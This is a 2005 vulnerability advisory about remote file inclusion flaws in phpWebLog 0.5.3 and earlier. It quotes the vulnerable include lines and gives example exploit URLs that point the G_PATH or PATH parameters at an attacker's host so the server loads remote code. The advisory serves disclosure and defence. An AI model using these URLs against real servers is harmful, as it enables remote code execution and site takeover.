-- == -- == -- == -- == -- == -- == -- == -- == -- == -- Name: phpWebLog Version: <= 0.5.3 Homepage: http://phpweblog.org/ Author: Filip Groszynski (VXSfx) Date: 7 March 2005 -- == -- == -- == -- == -- == -- == -- == -- == -- == -- Vulnerable code in include/init.inc.php: ... # Allowed HTML tags in stories, comma seperated $G_HTML = ",,,,
  • ,

    ,,,

    "; # Are we developing? $G_DEBUG = false; # Number of seconds to hold cache $G_CACHE = 10; # phpWebLog version $G_VER = "0.5.3"; ... /*== include libraries/functions =========================================*/ include_once("$G_PATH/include/func.inc.php"); include_once("$G_PATH/include/cache.inc.php"); include_once("$G_PATH/include/blocks.inc.php"); include_once("$G_PATH/include/layout.inc.php"); include_once("$G_PATH/include/parser.inc.php"); include_once("$G_PATH/include/search.inc.php"); include_once("$G_PATH/include/comments.inc.php"); .... -------------------------------------------------------- Vulnerable code in backend/addons/links/index.php: # Original links code written by Twyst (http://anime-central.net) # Modified for use with phpWebLog by Jason Hines # Thanks Twyst! include_once($PATH . "/functions.php"); .... -------------------------------------------------------- Example: if register_globals=on and allow_url_fopen=on: http://[victim]/[dir]/include/init.inc.php?G_PATH=http://[hacker_box]/ http://[victim]/[dir]/backend/addons/links/index.php?PATH=http://[hacker_box]/ -------------------------------------------------------- Vendor status: Vendor has been notified. -------------------------------------------------------- Contact: Author: Filip Groszynski (VXSfx) Location: Poland Email: groszynskif gmail com HP: http://shell.homeunix.org -- == -- == -- == -- == -- == -- == -- == -- == -- == --